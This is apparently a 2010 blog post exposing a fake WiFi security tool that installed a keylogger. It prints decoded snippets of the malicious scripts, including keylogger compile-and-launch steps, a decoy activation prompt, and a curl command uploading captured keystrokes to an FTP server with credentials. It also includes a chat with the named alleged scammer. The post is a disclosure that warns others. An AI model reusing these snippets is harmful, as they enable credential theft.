I have been playing around with some wireless security for one of my customers lately. Having a pretty solid understanding of how things work, but also having been challenged to try out รขโฌลeverything there is to tryรขโฌย by the client, I went off to look for new tools that I might not have tried before.
It did not take too long, and with the accidental help of TechCrunch (btw TechCrunch – you may want to change this link to something else after you read this…) I ran into this รขโฌลWifi Securityรขโฌย site.
Yes, I know, the design is horrible, the scrolling thing on the top of the page is just missing a <blink> tag to drive you into an epileptic seizure, and the music, well, itรขโฌโขs music as part of a website – welcome to the 80รขโฌโขs.
Not being deterred by the horrible design, I went ahead and downloaded the รขโฌลtoolsรขโฌย offered in the article. After all, the FBI are using this guyรขโฌโขs tools…
A quick look, and I was faced with three supposed shell scripts (ended with a .sh), and a tarball called รขโฌลrogue.tar.gzรขโฌย.
When you get a shellscript that isnรขโฌโขt a shellscript, and is being reported as an รขโฌลELFรขโฌย executable, you should get your detective hat on, which is exactly what I did.
It didnรขโฌโขt take long, and the scam unfolded pretty quickly. Hereรขโฌโขs a quick recap of whatรขโฌโขs going on with this guyรขโฌโขs website:
- The provided รขโฌลtoolsรขโฌย arenรขโฌโขt even security tools. Initially I figured – ok, so this guy packed a few open source wireless tools and scripted them for easy usage. No. Not even karma which the main script suggests that is being used (appropriately I might add for the purpose of what this script is SUPPOSED to do).
- A quick look at the tarball revealed that is actually contains a keylogger that has been graciously stolen from here.
- When the main script (karma.sh) is run, two supporting scripts (bg1.sh and bg2.sh) are launched. They are taking care of compiling the keylogger, running it, and pushing the logged keys logfile to an FTP for the attacker (I guess we can call him that now) to use at his convenience.
- You are prompted to log into your webmail account, send a request for a free activation code with an indemnity text, which would be answered by the รขโฌลautomaticรขโฌย processes on their end promptly so you can enter the code into the installer and start playing around with WiFi security. FTW!
Observant readers may notice that I referred to the tool as having รขโฌลsupposedรขโฌย script files, that are actually binaries, and now I refer back to them as scripts. What gives?
Well, simply put, our attacker didnรขโฌโขt really take the time to code an application, he just wrote a couple of shell scripts, and in order to try to hide his malicious and ill-intent actions he รขโฌลcompiledรขโฌย them with a utility that packs shellscripts in executable form called shc. The road from a linux executable to realizing what the script originally was is pretty short…
Now, that most of the cards are on the table, we can actually take a look at what scam this guy is running, and how he runs this. Following are some snippets from the shellscript that was presumably a wireless security tool. Even if you are not an avid Linux shellscripter, Iรขโฌโขm sure that the annotations (true to the original) will shed some light…
# START BACKGROUND PROGRAMS BG1(RUN LINUX KEYLOGGER) AND BG2(RUN MONITORING KEYSTROKES AND SEND LOG.TXT FILES TO DRIVEHQ)
cd lkl2
./configure –silent
make –silent
make install –silent
cd
chmod +x /root/bg1.sh
nohup /root/bg1.sh &
rm -r /root/nohup.out
chmod +x /root/bg2.sh
nohup /root/bg2.sh &
sleep 2
rm -r /root/nohup.out
clear
So, we see how the keylogger is compiled, installed and the supporting scripts bg1 and bg2 are run.
Next up, is the installer itself (if one can call that) which prompts for the user to send a FREE activation request to the attacker:
# MENU LIST
echo รขโฌลรขโฌย
echo รขโฌล——————————————————— รขโฌล
echo รขโฌลTHIS MESSAGES WILL NOT APPEAR AFTER karma.sh IS ACTIVATED รขโฌล
echo รขโฌล——————————————————— รขโฌล
echo รขโฌลรขโฌย
echo รขโฌล1. Compose indemnity text below and send to fadzilmahfodh@gmail.comรขโฌย
echo รขโฌล Yes, I want activation code and will never use for illegal purposeรขโฌย
echo รขโฌลรขโฌย
echo รขโฌล2. Check your email for activation code after sending text รขโฌล
echo รขโฌลรขโฌย
read -p รขโฌล3. Send now ? (0=no, 1=yes) รขโฌล act
clear
Obviously, the message WILL appear, as this thing is NEVER going to be activated – remember – this is a shellscript, and the รขโฌลmenuรขโฌย appears as-is unconditionally so you can try to activate this until blue in the face… but we are getting ahead of ourselves.
I mentioned in the title that the scam is targeting security people. Besides the obvious wireless security related topic, hereรขโฌโขs another little piece of รขโฌลevidenceรขโฌย from the script:
read -p “Which backtrack are you using ? (bt3=3,bt4=4) ” bt
Our little friend is assuming that we are using BackTrack (as most security folks do) to run their wireless tests… the script continues according to which version of BT is entered (to accommodate the differences in network configuration…).
Iรขโฌโขll skip through the network connectivity checks (trust me), and next up the attacker makes sure that firefox isnรขโฌโขt running, and:
firefox https://login.yahoo.com/ &
sleep 4
firefox https://www.google.com/accounts/ManageAccount &
sleep 4
firefox http://home.live.com/
The attacker obviously wants us to log into one of our webmail accounts so we can send him that activation request email with the indemnity text (how considerate). Keeping in mind that the keylogger is on and itรขโฌโขs activities are uploaded in the background to the attackerรขโฌโขs FTP – this is exactly where most people will fall into the trap.
And for the grand finale – the actual activation (youรขโฌโขd think huh?):
############################
# DECOY FOR ACTIVATION CODE
clear
echo “”
read -p “ENTER ROGUE AP ACTIVATION CODE : ” pls
sleep 3
echo “You have entered an invalid code ”
echo “”
exit
############################
You have to admit that commented code is the best! Itรขโฌโขs actually saying รขโฌลdecoyรขโฌย! How f*&^ing awesome is that? You get to craft your email after logging into your Yahoo!/Gmail/Live account, and then go back to this completely useless activation part. I do like the fact that the author put a รขโฌลsleep 3รขโฌย before letting you know that you entered the wrong code. As if it was hard at work verifying it. Classic.
Thatรขโฌโขs about it for the technical analysis, but it wouldnรขโฌโขt be complete without the actual interaction with the attacker, wouldnรขโฌโขt it? Letรขโฌโขs see – so, we crafted a รขโฌลrequest for free activationรขโฌย email with the indemnity text in it, and guess what – we got a reply!
Hi
1. We are preparing the activation code for you.
2. To make worth our while, could you consider a small donation (suggest euro 11) to support the website via Paypal a/c fadzilmahfodh@yahoo.com ?
Cheers.
EMAIL VIA MY CELLPHONE FOR FAST RESPONSE
http://fadzilmahfodh.blogspot.com
So not only there is no activation code to be รขโฌลpreparedรขโฌย for me (what? Iรขโฌโขm going to feed it to the รขโฌลdecoyรขโฌย and itรขโฌโขll magically work?), we are being prompted to donate some cash for the poor bastard who worked so hard to make this tool for the community…
I cordially answered that:
1. Thanks. Iรขโฌโขll be looking forward for the activation code.
2. I’ll probably consider it after being able to test out the tool.
Which was replied with a suggestion to try the trial version on his site (which relates to a completely different tool, but letรขโฌโขs not be too picky about it…).
Now, thankfully, I was using one of my throw-away yahoo accounts, and apparently so our attacker. If you havenรขโฌโขt noticed, one of the cool things in the new Yahoo! webmail is that you get an indication whether the person emailing you is online or not, and you can chat with them!
Guess what happens next…
—– Our chat on Wed, 7/7/10 2:53 PM —–
Iftach(2:34 PM): รย hey man
Iftach(2:34 PM): รย mind if a ask a couple of questions?
fadzilmahfodh(2:34 PM): รย okey
Iftach(2:35 PM): รย cool. I’m doing this research on security tools and their
authors…
fadzilmahfodh(2:35 PM): รย okey
Iftach(2:35 PM): รย saw your tool and wanted to hear about how you got to write
it, how well is it distributed in the community etc…
Iftach(2:36 PM): รย does that activation thing a common practice with free tools?
fadzilmahfodh(2:36 PM): รย yes see, we need to maintain our website thus we need
supporter
fadzilmahfodh(2:37 PM): รย everyday there are at least 500++ people asking for
code
Iftach(2:37 PM): รย I see.
fadzilmahfodh(2:37 PM): รย i no longer able to provide for free
fadzilmahfodh(2:37 PM): รย too time consuming and i need to be compensated for my
time and effort
fadzilmahfodh(2:38 PM): รย hope you understand
Time and effort? Right… For a scam script that doesnรขโฌโขt even have any networking functionality… Ok, Iรขโฌโขll go along…
Iftach(2:40 PM): รย now, about the tool – that’s a linux binary obviously (thought
it was a shell script at the beginning). Did you base it on something existing
or write yourself?
fadzilmahfodh(2:41 PM): รย i wrote it by my self then scramble the code
Iftach(2:41 PM): รย hence the activation i see…
fadzilmahfodh(2:42 PM): รย i can afford to give ‘free lunch’ to everybody. Hope
you understand
Iftach(2:43 PM): รย sure, i understand.
fadzilmahfodh(2:43 PM): รย So you interested in the software?
Iftach(2:44 PM): รย more from a research point of view – for an article I’m
writing
Iftach(2:44 PM): รย so, the installer you use, I see that it contains some
additional code that is being compiled on the client.
fadzilmahfodh(2:45 PM): รย Yes. The purpose is the code will be unique to user
hardware
Iftach(2:45 PM): รย and I saw that there were some FTP connections made? Is that
to verify that the client is a registered one?
fadzilmahfodh(2:46 PM): รย Well, that is another story…
Iftach(2:46 PM): รย I’m listening
fadzilmahfodh(2:46 PM): รย maybe some other time huh
Iftach(2:47 PM): รย OK. Last question – do you get a lot of account passwords
through that keylogger that sends the data to your FTP?
fadzilmahfodh(2:47 PM): รย sorry, no comment unless i am in court
At this point of my รขโฌลinterviewรขโฌย with him, I guess that my cover was going to get pretty real, hence this รขโฌลarticleรขโฌย that you are reading… You canรขโฌโขt make this stuff up so I figured Iรขโฌโขll blog it…
Iftach(2:48 PM): รย aha, and it’s part of the installer because? just to make sure
people can send the activation email correctly?
Iftach(2:48 PM): รย Back to statistics, out of the average 500 ppl asking for
activation – how many passwords do you manage to grab?
fadzilmahfodh(2:49 PM): รย well, the ftp is to confirm that software match with
data in server
fadzilmahfodh(2:49 PM): รย if it does not match, it will fail to run
fadzilmahfodh(2:49 PM): รย or i can just change the data/activation code in the
server
fadzilmahfodh(2:49 PM): รย then everything will not run
Iftach(2:49 PM): รย and how does that relate to the keylogging?
fadzilmahfodh(2:50 PM): รย well, that i another story…
Iftach(2:51 PM): รย I mean – the keylogger data is sent to that FTP. Is that part
of the verification or is this a separate process?
Iftach(2:51 PM): รย So, on average, how many accounts you manage to get on that
FTP server per day?
fadzilmahfodh(2:51 PM): รย well, you do not even support my website and how the
hell am i going to tell you
Iftach(2:52 PM): รย Let’s just get it straight – I’m not going to “support” the
site… I’m just doing some research on security tools.
fadzilmahfodh(2:52 PM): รย bye
Iftach(2:53 PM): รย You are free to tell, or not if you don’t want to. But I’m
publishing the story as it is…
Iftach(2:53 PM): รย With your acknowledgment that you use a keylogger to steal your
site visitor passwords. Unless you want to be quoted otherwise in the story…
True to my chat with Fadzil (or whatever his name is), Iรขโฌโขm telling it the way it is.
But wait, thereรขโฌโขs more!!! more? how come? well, just to put some icing on this, I went back and decoded the script that was in charge of the FTP upload…
curl -s -k –ftp-ssl -T /pentest/log.txt -u fadzilmahfodh:buaya ftp://ftp.drivehq.com/code$number.txt
Just to see the final lameness come to life as I tested the account:
And you know what – itรขโฌโขs all our fault! If we as a community would have รขโฌลdonatedรขโฌย to this guy for all his hard work and effort that heรขโฌโขs been putting in creating tools that are used by the FBI (check out his site…), he would have had the money to keep his driveHQ account in order and could make a decent living out of ripping people off.
Seriously.
p.s. you can find me talking about this entertaining even on the ISDPodcast with my buddy Rick, I just had to vent off before putting this in writing, so hopefully this account is a bit more thorough and to your liking…
Update 7/13/2010: I could not have wished for better response from the community on this post, but having the actual culprit respond here is priceless. As you can probably see, Fadzil has posted a comment, and to sum things up let me just state that I’m not that surprised by its content (I think it’s called “pulling a ligatt” these days…). On one hand he offhandedly dismisses that there was ever such an issue with a keylogger, on the other hand he promises a better version with (and I’m quoting): “rogue ap + fake login page + keylogger + ftp = to get WPA or WPA2 password”.
You don’t say?! I’m still waiting for the security practitioner that will explain to me why would anyone need a keylogger + ftp to use a rogue AP with fake login pages. I’m really hoping that this post helps the community learn more on criminals such as the one we are dealing with here. Don’t be tempted to “smooth-talk” that tries to look technical and hackerish while having nothing behind it. And if you have had any additional experiences with this guy feel free to add them to the comments or email me so I’ll update this story for everyone’s benefit.
Leave a Reply